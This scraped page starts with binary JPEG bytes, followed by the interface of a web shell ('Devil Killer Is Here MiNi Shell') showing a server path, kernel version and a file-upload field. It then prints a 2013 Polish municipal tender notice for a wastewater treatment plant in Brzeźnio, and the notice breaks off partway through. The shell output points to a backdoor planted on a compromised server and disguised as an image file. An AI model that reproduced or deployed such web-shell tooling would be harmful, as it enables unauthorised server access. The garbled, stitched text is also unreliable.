JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131115/466714-N-2013.html

<p class="kh_header"><b>Brzeźnio: Budowa oczyszczalni ścieków Qśrd=275 m3/d w miejscowości  Brzeźnio na działkach nr 209 i 210  Gmina Brzeźnio, Powiat Sieradzki
jako etap  II zadania inwestycyjnego pn.:
Rozbudowa sieci wodociągowych oraz budowa oczyszczalni ścieków jako II i III etap racjonalizacji gospodarki wodno-ściekowej Gminy Brzeźnio</b><br>
<b>Numer ogłoszenia: 466714 - 2013; data zamieszczenia: 15.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brzeźnio , ul. Wspólna 44, 98-275 Brzeźnio, woj. łódzkie, tel. 043 8203026, 043 8203024, faks 043 8203671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeznio.finn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oczyszczalni ścieków Qśrd=275 m3/d w miejscowości  Brzeźnio na działkach nr 209 i 210  Gmina Brzeźnio, Powiat Sieradzki
jako etap  II zadania inwestycyjnego pn.:
Rozbudowa sieci wodociągowych oraz budowa oczyszczalni ścieków jako II i III etap racjonalizacji gospodarki wodno-ściekowej Gminy Brzeźnio.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedsięwzięcie pn.: Budowa oczyszczalni ścieków Qśrd=275 m3/d w miejscowości  Brzeźnio na działkach nr 209 i 210  Gmina Brzeźnio, Powiat Sieradzki jako etap  II zadania inwestycyjnego pn.:
Rozbudowa sieci wodociągowych oraz budowa oczyszczalni ścieków jako II i III etap racjonalizacji gospodarki wodno-ściekowej Gminy Brzeźnio
ma na celu uregulowanie gospodarki wodno - ściekowej gwarantujące oczyszczenie ścieków z terenu gminy Brzeźnio doprowadzonych za pomocą kolektora sanitarnego jak również dowożonych taborem kołowym.

2) Przedmiotem zamówienia jest budowa oczyszczalni ścieków na działkach 209 i 210 w Brzeźniu. 
W ramach przedmiotu zamówienia należy wykonać m.in. następujące obiekty:
- budynek techniczny,
- budynek oczyszczalni ścieków,
- budynek techniczno -socjalny,
- tacę ociekową,
- osłonę śmietnikową,
- zjazd z drogi powiatowej,
- place,
- drogi wewnętrzne i miejsca postojowe,
- ogrodzenie wraz z bramą wjazdową,
- instalacje wodociągową wewnętrzną i zewnętrzną,
- kanalizację sanitarną na terenie oczyszczalni ścieków,
- rurociągi technologiczne,
- przebudowę istniejącego złącza kablowego, 
- instalację elektryczną i AKPiA, 
- przebudowę istniejącego drenażu melioracyjnego,
- instalację c.o, 
-instalację wentylacji mechanicznej i grawitacyjnej,
- instalację wod.-kan.

a) Szczegółowy zakres robót określają: dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary robót stanowiące rozdział III siwz.


b) Wykonawca zobowiązany jest do wykonania robót budowlanych na podstawie wydanego pozwolenia na budowę nr 626/211 z 2 września 2011 roku, zgodnie ze sztuką budowlaną, obowiązującymi przepisami i normami, w tym ochrony środowiska oraz przy zachowaniu przepisów BHP i p.poż., przy maksymalnym ograniczeniu uciążliwości prowadzonych robót. Wykonawca gwarantuje także wykonanie przedmiotu zamówienia pod kierownictwem osób posiadających wymagane przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie.

c) Wykonawca zapewnia materiały i urządzenia niezbędne do wykonania przedmiotu umowy, posiadające aktualne atesty i certyfikaty, świadectwa pozwalające na ich stosowanie. Dokumenty te zobowiązany jest przedłożyć Inspektorowi nadzoru oraz Zamawiającemu. Transport materiałów na plac budowy oraz dostarczenie i eksploatacja maszyn i urządzeń obciążają Wykonawcę.

d) Wykonawca gwarantuje, że użyte do wykonania obiektów materiały, urządzenia itp. będą nowoczesne, fabrycznie nowe, wysokiej jakości oraz pozbawione będą wad projektowych wykonawczych i materiałowych, a ich elementy stanowić będą nowoczesne i sprawdzone rozwiązania technologiczne i projektowe. Zamawiający nie dopuszcza maszyn i urządzeń prototypowych.

e) Po zakończeniu robót, ale przed ostatecznym odbiorem przez Zamawiającego Wykonawca zobowiązany jest do uporządkowania terenu budowy wraz z terenem przyległym i doprowadzenia ich do stanu jaki był przed rozpoczęciem robót (w tym drogi dojazdowej).

f) Wykonawca zapewnia szkolenie personelu Zamawiającego w trakcie rozruchu, ruchu regulacyjnego i ruchu próbnego, w zakresie montażu, uruchomienia, eksploatacji, konserwacji lub napraw oraz zapewnia pomoc merytoryczną (w tym dojazd na miejsce w przypadku zaistnienie takiej potrzeby) w okresie trwania gwarancji i rękojmi.

g) Wykonawca gwarantuje wykonanie kompletnego przedmiotu umowy zgodnie z warunkami pozwolenia na budowę, zgłoszenia robót budowlanych, pozwoleń wodno prawnych itp., warunkami technicznymi wykonania i odbiorów oraz z aktualnie obowiązującymi normami państwowymi, prawem budowlanym i innymi obowiązującymi przepisami oraz dobrą praktyką inżynierską.

h) Wykonawca ma obowiązek sporządzić kompletną dokumentację powykonawczą robót, w tym dokumentację do celów odbioru końcowego, nadzoru budowlanego, dla dozoru technicznego, straży pożarnej, służb sanitarno-epidemiologicznych, służb ochrony środowiska, potrzeb dostawcy energii elektrycznej itp. Wykonawca ma obowiązek uzyskać wszystkie niezbędne dokumenty potwierdzające prawidłowość wykonania robót, przygotować wszystkie kompletne dokumenty, badania, analizy i sprawdzenia, uzyskać pozwolenie na użytkowanie obiektu.

i) Wykonawca ponosi odpowiedzialność za uszkodzenie mienia i inne szkody wyrządzone Zamawiającemu, jego podwykonawcom i osobom trzecim o ile wynikają one z działania lub zaniechania Wykonawcy.

j) Wykonawca zapewni od momentu przejęcia placu budowy do chwili podpisania przez Zamawiającego Protokołu Odbioru Końcowego:
-  bezpieczeństwo wszystkich osób upoważnionych do przebywania na placu budowy, zgodnie 
z obowiązującymi przepisami bhp,
-  utrzymanie placu budowy i obiektów w należytym porządku,
- ochrony ppoż. placu budowy,
-  ochrony mienia znajdującego się na placu budowy,
- wykonania i utrzymania na placu budowy oświetlenia, oznakowania, zapór, przegród, zabezpieczeń.
- niezwłoczne usuwanie zanieczyszczeń i uszkodzeń dróg, dojazdów do placu budowy, placów składowych.

k) Zamawiający zaleca, by Wykonawca zapoznał się z miejscem wykonania przedmiotu zamówienia w celu sprawdzenia warunków i terenu prac będących przedmiotem zamówienia niezbędnych do wyceny prac - stąd wyklucza się roszczenia Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy w związku z powyższym.

3) Oferta powinna uwzględniać również następujące koszty:
a) wszelkie koszty związane z realizacją zamówienia wynikające z SIWZ,
b) koszt wykonania robót budowlanych w tym: urządzenia, materiały sprzęt, robocizna, narzuty i dodatki dla Wykonawcy,
c) koszty zatrudnionego personelu,
d) koszty transportu,
e) zabezpieczenie obsługi geodezyjnej prowadzonych robót oraz wznowienie geodezyjne znaków granicznych w przypadku ich naruszenia w trakcie prowadzonych robót,
f) zlecenie nadzorów do właścicieli sieci uzbrojenia terenu,
g) dokonanie ewentualnych uzgodnień z właścicielami w związku z prowadzeniem robót w pasie drogowym, łącznie z opłatą za zajęcie terenu,
h) koszty wszelkich robót przygotowawczych, przygotowanie placu budowy wraz z  dokonaniem geodezyjnego wytyczenia przedmiotu umowy w terenie oraz wyznaczenie stałych punktów odniesienia,
i) urządzenie terenu budowy, utrzymanie zaplecza budowy i placu budowy (dostawa wody, usuwanie ścieków, wywóz śmieci, organizacja zaplecza socjalnego, oświetlenie, zasilanie w energię elektryczną, telefon, itp.) dozorowanie budowy, 
j) wywóz nadmiaru urobku, koszty wywozu i utylizacji odpadów powstałych w wyniku realizacji robót,
k) organizacje ruchu na czas prowadzenia robót,
l) wykonanie dokumentacji powykonawczej (budowlanej i geodezyjnej), łącznie 
z naniesieniami zmian do zasobów mapowych, wraz z wersją elektroniczną i uzyskanie potwierdzenia,
m) koszty związane z obsługą i inwentaryzacją geodezyjną wykonywanych robót,
n) koszty związane z odbiorami wykonywanych robót,
o) koszty związane z uzyskaniem pozwolenia na użytkowanie,
p) wykonanie badań powykonawczych tj. badań stopnia zagęszczenia podbudowy na odcinkach dróg i terenach utwardzonych lub innych miejscach wskazanych przez Zamawiającego, a związanych z przedmiotem zamówienia,
q) prac porządkowych,
r) koszty odtworzenia zniszczonych nawierzchni ciągów komunikacyjnych, oraz poniesienie konsekwencji ewentualnych innych szkód powstałych w trakcie prowadzenia robót,
s) kompleksowy rozruch technologiczny w ramach którego należy uwzględnić wszystkie koszty związane  z właściwym prowadzeniem rozruchu technologicznego, tzn.: koszty energii elektrycznej, koszty konserwacji urządzeń (np. wymiana oleju), koszty obsługi oczyszczalni, koszty środków chemicznych używanych w procesach (np. w procesie odwadniania osadu), koszty szkolenia docelowego obsługi oczyszczalni, koszty wykonywania analiz ścieków i osadu,
t) sporządzenie instrukcji obsługi oczyszczalni i instrukcji stanowiskowych,
u) przeszkolenie pracowników obsługi wskazanych przez użytkownika,
v) przez okres 1 roku od dnia odbioru końcowego przedmiotu zamówienia Wykonawca ma świadczyć doradztwo w rozwiązywaniu problemów i w razie potrzeby nadzorować proces oczyszczania ścieków,
w) wszystkie koszty ogólne obejmujące: gwarancje, ubezpieczenia, zaplecze budowy, tablice informacyjne, analizy i badania, próby końcowe, przedodbiorowe i odbiorowe, instrukcje eksploatacji i konserwacji, dokumentacje powykonawcze, rozruch technologiczny, roboty tymczasowe.

 Wykonawca zobowiązany jest do korzystania z punktu poboru energii znajdującego się na działce nr 198/3.

4) W przypadku wygrania przetargu i realizacji robót przy udziale podwykonawców Wykonawca zobowiązany będzie do zawarcia umów z podwykonawcami, zgodnie z postanowieniami art. 6471 - Kodeksu Cywilnego.

5) W przypadku wyboru oferty jako najkorzystniejszej, Wykonawca zobowiązany będzie do ubezpieczenia budowy od mogących wystąpić szkód, nagłych zdarzeń losowych oraz od odpowiedzialności cywilnej.
Zamawiający wymaga, aby Wykonawca przed przystąpieniem do wykonywania przedmiotu zamówienia przedłożył polisy lub inne dokumenty ubezpieczenia, potwierdzające zawarcie ubezpieczenia na okres od dnia rozpoczęcia do dnia ukończenia robót, obejmującego:
- ubezpieczenie robót, urządzeń i sprzętu budowlanego do wysokości 100% umownego wynagrodzenia,
- ubezpieczenie osób trzecich.


6) Szczególne obowiązki Wykonawcy i wymagania odnośnie sposobu prowadzenia robót:
a) Uwagi dotyczące realizacji przedmiotu zamówienia:
Wykonawca wykona przedmiot zamówienia zgodnie  dokumentacją projektową na podstawie warunków niniejszego przetargu, z materiałów fabrycznie nowych w I gatunku.
Roboty winny zostać wykonane i ukończone zgodnie z prawem obowiązującym w Rzeczypospolitej Polskiej, w szczególności: Prawem Budowlanym, Prawem Ochrony Środowiska, Prawem o Ruchu Drogowym ora z Ustawą o drogach publicznych, Ustawą o odpadach, Ustawą o badaniach i certyfikacji i wymaganiami Zamawiającego, a kierowanie i nadzorowanie robót mogą wykonywać osoby, które posiadają wymagane prawem uprawnienia i są ubezpieczone od odpowiedzialności cywilnej.
Szczególną uwagę Wykonawcy muszą również zwrócić na warunki dotyczące zatrudnienia pracowników na terytorium Rzeczypospolitej Polskiej oraz obowiązek przestrzegania wszystkich przepisów prawnych dotyczących warunków świadczenia pracy dla każdej grupy pracowników.
Wykonawcy ponoszą wyłączną odpowiedzialność za zbadanie z należytą starannością specyfikacji istotnych warunków zamówienia, oraz za uzyskanie informacji w odniesieniu do każdego i wszelkich warunków i zobowiązań, które w jakikolwiek sposób mogą wpłynąć na wartość lub charakter oferty lub na wykonanie Robót. W przypadku, kiedy Wykonawca zostanie wybrany, żadne żądanie o zmianę ceny ofertowej nie może zostać wniesione na podstawie błędów lub ominięć w świetle powyższych zobowiązań Wykonawcy.
Uznaje się, iż złożenie ofert oznacza, że Wykonawcy zapoznali się ze wszelkimi odpowiednimi ustawami i innymi przepisami prawnymi obowiązującymi w Rzeczypospolitej Polskiej, które mogą w jakikolwiek sposób wpłynąć nań, lub dotyczyć działań i czynności objętych ofertą i wynikającą z niej umową w sprawie zamówienia publicznego.
b) Zastosowane materiały i urządzenia muszą być wykonane zgodnie z Polskimi Normami przenoszącymi europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy wynikające z art. 30 Ustawy Prawo Zamówień Publicznych:
Europejskie aprobaty techniczne,
Wspólne specyfikacje techniczne,
Polskie Normy przenoszące normy europejskie,
Normy państw członkowskich Unii Europejskiej przenoszące europejskie normy zharmonizowane,
Polskie Normy wprowadzające normy międzynarodowe,
Polskie Normy,
Polskie aprobaty techniczne.

7) Zakres przedmiotu zamówienia obejmuje również rozruch technologiczny oczyszczalni oraz niezbędne ekspertyzy techniczne, dokumentację powykonawczą oraz wszelką obsługę techniczną.
W ramach przedmiotu zamówienia Wykonawca wykona pełną obsługę geodezyjną wraz z inwentaryzacją  powykonawczą.

8) W okresie gwarancji serwisowanie, w tym wynikające z wytycznych producenta, materiały eksploatacyjne dla maszyn, urządzeń i aparatury zapewnia Wykonawca.
Wykonawca w przypadku uszkodzenia maszyny, urządzenia i aparatury w okresie gwarancji zapewni urządzenia zastępcze.

9) Wykonawca wykona wszystkie roboty wynikające z dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót, przedmiarów robót niezbędne do realizacji przedmiotu zamówienia.

10) Wymagany okres rękojmi za wady i gwarancji jakości dla elementów przedmiotu zamówienia wynosi na wykonane roboty (materiały i robociznę, maszyny, urządzenia, aparatura) i wady wbudowanych materiałów, maszyn, urządzeń, aparatury - co najmniej 5 lat od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.

Okres rękojmi musi być równy okresowi gwarancji.

Zabezpieczenie antykorozyjne instalacji, budowli, urządzeń musi zapewniać trwałość w okresie gwarancji i rękojmi wynikającą z normalnej pracy oczyszczalni narażonej na kontakt z różnymi elementami ścieków i osadów.

11) Jeżeli gdziekolwiek w niniejszej SIWZ (dokumentacji przetargowej tj. opisy techniczne, specyfikacja techniczna wykonania i odbioru robót  i przedmiary robót)  pojawia się nazwa, marka lub typ wskazujący na konkretnego producenta, należy to interpretować, że określenie ma jedynie charakter przykładowy, a Wykonawca sporządzając ofertę może uwzględnić wyrób każdego innego producenta, który jest równoważny tzn. posiada co najmniej takie same lub korzystniejsze parametry wydajnościowe i jakościowe oraz standard wykonania w stosunku do podanych w SIWZ przykładów. Parametry wydajnościowe i jakościowe zostały wskazane w dokumentacji projektowej.

Możliwość zastosowania urządzeń równoważnych uzależniona będzie od ich zgodności ze wszystkimi parametrami określonymi w projekcie i specyfikacji technicznej wykonania i odbioru robót budowlanych.

Powyższe zmiany muszą być wykazane w załączonej tabeli Wykaz urządzeń i materiałów równoważnych i dołączone do oferty - załącznik nr 11 do SIWZ. Brak wskazania w załączniku propozycji zastosowania urządzeń i materiałów równoważnych oznaczać będzie deklarację Wykonawcy, że przedmiot zamówienia zostanie wykonany przy zastosowaniu urządzeń i materiałów przyjętych w projekcie budowlanym. Udowodnienie, że urządzenia 
i materiały są równoważne spoczywa na Wykonawcy na etapie składania ofert. Dokumenty potwierdzające równoważność należy załączyć do oferty  (art. 30 ust. 5 ustawy Pzp)

W sytuacji zastosowaniu materiałów i urządzeń równoważnych Zamawiający wymaga  złożenia stosownych dokumentów uwiarygodniających parametry jakościowe, bądź użytkowe tych materiałów lub urządzeń.
Zamawiający zastrzega sobie prawo do uzyskania informacji odnośnie miejsca zainstalowania i pracy urządzenia równoważnego oraz dokonania oględzin i sprawdzenia jego działania na wskazanym obiekcie.
Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych rozwiązań.
Zamawiający zastrzega sobie także prawo do korzystania z opinii ekspertów, rzeczoznawców, itp.

3. Dokumentacja projektowa dostępna jest do wglądu w Urzędzie Gminy w Brzeźniu, ul. Wspólna 44, 98-275 Brzeźnio, pokój nr 5,  
od poniedziałku do piątku w godz. 7:30 - 15:30 oraz została zamieszczona na stronie internetowej Urzędu Gminy w Brzeźniu www.brzeznio.finn.pl 

Osoby odpowiedzialne: 
Roman Przezak  - podinspektor
Nr telefonu: 43-820-30-26
Nr faksu: 43-820-36-71
E-mail: rprzezak@brzeznio.pl.

Grzegorz Pokrakowski - Kierownik Referatu Rolnictwa Gospodarki Komunalnej i Ochrony Środowiska
Nr telefonu: 43-820-30-26
Nr faksu: 43-820-36-71
E-mail: gpokrakowski@brzeznio.pl..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie w okresie 3 lat od podpisania umowy zamówień uzupełniających, o których mowa w art. 67 ust. 1, pkt 6 Prawo zamówień publicznych. Zamawiający przewiduje udzielić zamówienia uzupełniające do wysokości 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.24.00-6, 45.26.24.00-5, 45.24.72.00-2, 45.00.00.00-7, 45.11.23.00-8, 45.23.13.00-8, 45.31.11.00-1, 45.31.61.00-6, 45.31.42.00-3, 45.31.43.00-4, 45.31.57.00-5, 45.31.70.00-2, 45.31.12.00-2, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości  80 000,00 (słownie: osiemdziesiąt tysięcy złotych)  wniesionym przed upływem terminu składania ofert.
2. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym ze poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.)
3. Wadium wnoszone w pieniądzu wpłaca się na rachunek Zamawiającego nr rachunku 28 9267 0006 0030 1950 3000 0040 Bank Spółdzielczy w Sieradzu, Oddział w Brzeźniu, 
ul. Wspólna 39, 98-275 Brzeźnio.
4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
5. W przypadku gdy wadium wnoszone jest w innej formie niż pieniądz, Wykonawca powinien do oferty załączyć oryginał dowodu jego wniesienia.
6. Wadium musi obejmować cały okres związania ofertą.
7. Wykonawca, którego oferta nie będzie zabezpieczona akceptowaną formą wadium zostanie wykluczony z postępowania.
8. Zamawiający  zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy na warunkach określonych w ofercie,
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.

10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca:

1) w odpowiedzi na wezwanie, o którym mowa w art. 26 ut.3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po stronie Wykonawcy
2) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
3) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
4) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia  polegające na budowie, modernizacji lub przebudowie oczyszczalni ścieków o przepustowości co najmniej 275 m3/d i RLM = 2 400 i wartości min. 3,5 mln zł w ramach jednego lub dwóch zamówień (w sumie) - 
w tym roboty budowlane, elektryczne i wodno - kanalizacyjne wraz z podaniem ich rodzaju oraz wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Wartości podane w walutach innych niż wskazane przez Zamawiającego dla wartości robót budowlanych należy przeliczyć wg średniego kursu NBP na dzień odbioru tych robót, podając datę i kurs.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wskazać do wykonania niniejszego zamówienia posiadanie osób wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami:
1) kierownik budowy - niniejsza osoba ma posiadać następujące kwalifikacje:
- co najmniej 5-letnie doświadczenie zawodowe na stanowisku kierownika robót sanitarnych,
